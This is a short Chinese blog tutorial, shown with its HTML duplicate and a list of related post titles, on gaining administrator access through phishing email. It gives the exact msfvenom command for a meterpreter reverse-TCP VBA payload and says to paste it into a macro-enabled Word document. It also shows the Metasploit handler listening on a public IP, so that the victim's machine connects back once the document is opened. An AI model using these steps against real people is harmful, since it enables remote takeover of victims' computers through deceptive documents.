通过钓鱼邮件获取管理员权限

博主： literature
发布时间：2020 年 04 月 23 日
359 次浏览
关闭评论
618字数
分类：主机教程

首先我们利用msf生成vbs

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.95 LPORT=4444 -f vba -o try.vba

设置word

新建一个word文档，文件另存为启用宏的word文档

然后开发工具——visual Basic
选择我们的项目ThisDocument双击打开，粘贴我们生成的shell。

保存完成后，配置msf。

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST ip
LHOST => 106.13.39.165
msf5 exploit(multi/handler) > set LPORT 5555
LPORT => 5555

当目标运行word文档后，在msf中便会得到反弹！

版权属于：逍遥子大表哥

本文链接：https://blog.bbskali.cn/1941.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

最后修改：2023 年 08 月 04 日

如果觉得我的文章对你有用，请随意赞赏

此处评论已关闭

通过钓鱼邮件获取管理员权限

literature • 2020 年 04 月 23 日

<p><img src="https://blog.bbskali.cn/usr/uploads/2020/04/271899027.png" alt="emali" title="emali" style="" class="aligncenter"style=""></p><h3>首先我们利用msf生成vbs</h3><pre><code>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.95 LPORT=4444 -f vba -o try.vba</code></pre><p><img src="https://niu.bbskali.cn/2cbc441419f229086d3025f07ff22cc6" alt="生成恶意shell" title="生成恶意shell" style="" class="aligncenter"style=""></p><h3>设置word</h3><p>新建一个word文档，文件另存为<code>启用宏的word</code>文档<br /><img src="https://niu.bbskali.cn/0bf3c4f2338cd5277476a26632e6cc4a" alt="启用宏的word文档" title="启用宏的word文档" style="" class="aligncenter"style=""><br />然后<code>开发工具</code>——<code>visual Basic</code><br />选择我们的项目<code>ThisDocument</code>双击打开，粘贴我们生成的shell。<br /><img src="https://niu.bbskali.cn/c9ea8f1075a696174317819eafb6460d" alt="" title="" style="" class="aligncenter"style=""><br />保存完成后，配置msf。</p><pre><code>msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST ip
LHOST => 106.13.39.165
msf5 exploit(multi/handler) > set LPORT 5555
LPORT => 5555</code></pre><p>当目标运行word文档后，在msf中便会得到反弹！<br /><img src="https://niu.bbskali.cn/39e5c79b63f59a47df5f9a28d85e96f3" alt="" title="" style="" class="aligncenter"style=""></p><p><hr class="content-copyright" style="margin-top:50px"></p><div class="post-copyright" style="font-style:normal"><p class="iconfont-copyright"><i class="glyphicon glyphicon-copyright-mark"></i></p><p class="content-copyright">版权属于：逍遥子大表哥</p><p class="content-copyright">本文链接：https://blog.bbskali.cn/1941.html</p><p class="content-copyright">按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。</p></div>

通过钓鱼邮件获取管理员权限

首先我们利用msf生成vbs

设置word

live/msn等微软绝版邮箱详细的注册教程

欢迎使用 Typecho

一个功能强大又好用的RSS订阅器：FreshRSS安装教程

使用Aria2下载BT磁力的时候，速度慢或者没速度的解决方法

VPS使用BaiduPCS-Go高速下载百度网盘的文件，支持上传/离线下载等操作

渗透中另一种抓系统密码HASH的技巧

树莓派3B+双网卡 & OpenWRT脚本开机自启（自动加载网卡）

查找网站真实ip的一种方法

【已失效】羊了个羊全自动通关（自动获取token）-主机教程

一款社会工程学&网络钓鱼工具

通过钓鱼邮件获取管理员权限